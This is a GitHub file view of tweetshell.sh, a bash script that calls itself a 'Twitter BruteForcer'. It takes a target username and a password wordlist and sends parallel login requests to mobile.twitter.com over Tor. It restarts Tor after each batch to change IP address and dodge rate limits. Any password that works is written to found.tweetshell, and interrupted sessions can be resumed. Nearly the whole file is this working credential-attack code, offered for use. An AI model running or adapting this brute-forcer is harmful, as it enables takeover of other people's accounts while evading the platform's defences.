forked from Mehran/tweetshell
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathtweetshell.sh
232 lines (207 loc) · 8.86 KB
/
tweetshell.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
#!/bin/bash
# Tweetshell v1.0
# Coded by @thelinuxchoice, updated by @ajmeese7
trap 'store;exit 1' 2
checkroot() {
if [[ "$(id -u)" -ne 0 ]]; then
printf "\e[1;77mPlease, run this program as root!\n\e[0m"
exit 1
fi
}
dependencies() {
command -v tor > /dev/null 2>&1 ||
{
echo >&2 "I require tor but it's not installed. Run ./install.sh. Aborting.";
exit 1;
}
command -v curl > /dev/null 2>&1 || {
echo >&2 "I require curl but it's not installed. Run ./install.sh. Aborting.";
exit 1;
}
}
banner() {
printf "\e[1;36m _ _ _____ _ \e[1;92m _ _ _ \e[0m\n"
printf "\e[1;36m _| || |_ |_ _| | | \e[1;92m | | | | | \e[0m\n"
printf "\e[1;36m |_ __ _| | |_ _____ ___| |_\e[1;92m ___| |__ ___| | | \e[0m\n"
printf "\e[1;36m _| || |_ | \ \ /\ / / _ \/ _ \ __\e[1;92m/ __| '_ \ / _ \ | | \e[0m\n"
printf "\e[1;36m |_ __ _| | |\ V V / __/ __/ |_\e[1;92m\__ \ | | | __/ | | \e[0m\n"
printf "\e[1;36m |_||_| \_/ \_/\_/ \___|\___|\__\e[1;92m|___/_| |_|\___|_|_| \e[0m\n"
printf "\n"
printf "\e[1;77m\e[44m Twitter BruteForcer v1.0 Author: @thelinuxchoice \e[0m\n"
printf "\n"
}
function start() {
checkroot
banner
dependencies
# Create the 'cookies' directory if it doesn't exist
mkdir ./cookies > /dev/null 2>&1
read -p $'\e[1;92mUsername account: \e[0m' username
checkaccount=$(curl -L -s https://www.twitter.com/$username/ | grep -c "Sorry, that page doesn’t exist!")
if [[ "$checkaccount" == 1 ]]; then
printf "\e[1;91mInvalid Username! Try again\e[0m\n"
sleep 1
start
else
default_wl_pass="passwords.lst"
read -p $'\e[1;92mPassword list (Enter to default list): \e[0m' wl_pass
wl_pass="${wl_pass:-${default_wl_pass}}"
default_threads="10"
read -p $'\e[1;92mThreads (Use < 20, Default 10): \e[0m' threads
threads="${threads:-${default_threads}}"
fi
}
checktor() {
check=$(curl -s https://check.torproject.org > /dev/null; echo $?)
if [[ "$check" -gt 0 ]]; then
printf "\e[1;91mPlease, check your TOR Connection! Just type 'tor' or 'service tor start'\n\e[0m"
exit 1
fi
}
function store() {
if [[ -n "$threads" ]]; then
printf "\e[1;91m [*] Waiting threads shutting down...\n\e[0m"
if [[ "$threads" -gt 10 ]]; then
sleep 6
else
sleep 3
fi
rm -rf ./cookies/*
default_session="Y"
printf "\n\e[1;77mSave session for user\e[0m\e[1;92m %s \e[0m" $username
read -p $'\e[1;77m? [Y/n]: \e[0m' session
session="${session:-${default_session}}"
if [[ "$session" == "Y" || "$session" == "y" || "$session" == "yes" || "$session" == "Yes" ]]; then
if [[ ! -d sessions ]]; then
mkdir sessions
fi
printf "username=\"%s\"\npassword=\"%s\"\nwl_pass=\"%s\"\ntoken=\"%s\"\n" $username $password $wl_pass $token > sessions/store.session.$username.$(date +"%FT%H%M")
printf "\e[1;77mSession saved.\e[0m\n"
printf "\e[1;92mUse 'sudo ./tweetshell --resume'\n"
else
exit 1
fi
else
exit 1
fi
}
function changeip() {
killall -HUP tor
}
function bruteforcer() {
uagent="Mozilla/5.0 (Series40; NokiaX2-02/10.90; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.2.26.11"
checktor
count_pass=$(wc -l $wl_pass | cut -d " " -f1)
printf "\e[1;92mUsername:\e[0m\e[1;77m %s\e[0m\n" $username
printf "\e[1;92mWordlist:\e[0m\e[1;77m %s (%s)\e[0m\n" $wl_pass $count_pass
printf "\e[1;91m[*] Press Ctrl + C to stop or save session\n\e[0m"
token=0
startline=1
endline="$threads"
changeip
while [ $token -lt $count_pass ]; do
IFS=$'\n'
for password in $(sed -n ''$startline','$endline'p' $wl_pass); do
countpass=$(grep -n "$password" "$wl_pass" | cut -d ":" -f1)
COOKIES='./cookies/cookie'$countpass''
let token++
printf "\e[1;77mTrying pass (%s/%s)\e[0m: %s\n" $token $count_pass $password
{(trap '' SIGINT && initpage=$(curl --socks5-hostname localhost:9050 -s -b $COOKIES -c $COOKIES -L -A "$uagent" "https://mobile.twitter.com/session/new");
tokent=$(echo "$initpage" | grep "authenticity_token" | sed -e 's/.*value="//' | cut -d '"' -f 1 | head -n 1);
var=$(curl --socks5-hostname localhost:9050 -s -b $COOKIES -c $COOKIES -L -A "$uagent" -d "authenticity_token=$tokent&session[username_or_email]=$username&session[password]=$password&remember_me=1&wfa=1&commit=Log+in" "https://mobile.twitter.com/sessions");
if [[ "$var" == *"/account/login_verification"* ]]; then
printf "\e[1;92m \n [*] Password Found: %s\n [!] Login verification required.\n" $password;
printf "Username: %s, Password: %s\n" $username $password >> found.tweetshell;
printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.tweetshell \n\e[0m";
rm -rf ./cookies/*;
kill -1 $$;
elif [[ "$var" == *"/account/login_challenge"* ]]; then
printf "\e[1;92m \n [*] Password Found: %s\n [!] Login challenge required.\n" $password;
printf "Username: %s, Password: %s\n" $username $password >> found.tweetshell;
printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.tweetshell \n\e[0m";
rm -rf ./cookies/*;
kill -1 $$;
elif [[ "$var" == *"/compose/tweet"* ]]; then
printf "\e[1;92m \n [*] Password Found: %s\n" $password;
printf "Username: %s, Password: %s\n" $username $password >> found.tweetshell;
printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.tweetshell \n\e[0m";
rm -rf ./cookies/*;
kill -1 $$;
fi;
)} &
done; wait $!;
let startline+=$threads
let endline+=$threads
changeip
rm -rf ./cookies/cookie1
rm -rf ./cookies/cookie$countpass
done
exit 1
}
function resume() {
checkroot
banner
checktor
counter=1
if [[ ! -d sessions ]]; then
printf "\e[1;91m[*] No sessions\n\e[0m"
exit 1
fi
printf "\e[1;92mFiles sessions:\n\e[0m"
for list in $(ls sessions/store.session*); do
IFS=$'\n'
source $list
printf "\e[1;92m%s \e[0m\e[1;77m: %s (\e[0m\e[1;92mwl:\e[0m\e[1;77m %s\e[0m\e[1;92m,\e[0m\e[1;92m lastpass:\e[0m\e[1;77m %s )\n\e[0m" "$counter" "$list" "$wl_pass" "$password"
let counter++
done
read -p $'\e[1;92mChoose a session number: \e[0m' fileresume
source $(ls sessions/store.session* | sed ''$fileresume'q;d')
default_threads=10
read -p $'\e[1;92mThreads (Use < 20, Default 10): \e[0m' threads
threads="${threads:-${default_threads}}"
printf "\e[1;92m[*] Resuming session for user:\e[0m \e[1;77m%s\e[0m\n" $username
printf "\e[1;92m[*] Wordlist: \e[0m \e[1;77m%s\e[0m\n" $wl_pass
printf "\e[1;91m[*] Press Ctrl + C to stop or save session\n\e[0m"
count_pass=$(wc -l $wl_pass | cut -d " " -f1)
changeip
while [ $token -lt $count_pass ]; do
IFS=$'\n'
for password in $(sed -n '/\b'$password'\b/,'$(($token+threads))'p' $wl_pass); do
COOKIES='./cookies/cookie'$countpass''
countpass=$(grep -n -w "$password" "$wl_pass" | cut -d ":" -f1)
printf "\e[1;77mTrying pass (%s/%s)\e[0m: %s\n" $token $count_pass $password
let token++
{(trap '' SIGINT && initpage=$(curl --socks5-hostname localhost:9050 -s -b $COOKIES -c $COOKIES -L -A "$uagent" "https://mobile.twitter.com/session/new");
tokent=$(echo "$initpage" | grep "authenticity_token" | sed -e 's/.*value="//' | cut -d '"' -f 1 | head -n 1);
var=$(curl --socks5-hostname localhost:9050 -s -b $COOKIES -c $COOKIES -L -A "$uagent" -d "authenticity_token=$tokent&session[username_or_email]=$username&session[password]=$password&remember_me=1&wfa=1&commit=Log+in" "https://mobile.twitter.com/sessions");
if [[ "$var" == *"/account/login_verification"* ]]; then
printf "\e[1;92m \n [*] Password Found: %s\n [!] Login verification required.\n" $password;
printf "Username: %s, Password: %s\n" $username $password >> found.tweetshell;
printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.tweetshell \n\e[0m";
rm -rf ./cookies/*;
kill -1 $$;
elif [[ "$var" == *"/account/login_challenge"* ]]; then
printf "\e[1;92m \n [*] Password Found: %s\n [!] Login challenge required.\n" $password;
printf "Username: %s, Password: %s\n" $username $password >> found.tweetshell;
printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.tweetshell \n\e[0m";
rm -rf ./cookies/*;
kill -1 $$;
elif [[ "$var" == *"/compose/tweet"* ]]; then
printf "\e[1;92m \n [*] Password Found: %s\n" $password;
printf "Username: %s, Password: %s\n" $username $password >> found.tweetshell;
printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.tweetshell \n\e[0m";
rm -rf ./cookies/*;
kill -1 $$;
fi;
)} &
done; wait $!;
changeip
rm -rf ./cookies/cookie1
rm -rf ./cookies/cookie$countpass
done
exit 1
}
case "$1" in --resume) resume ;; *)
start
bruteforcer
esac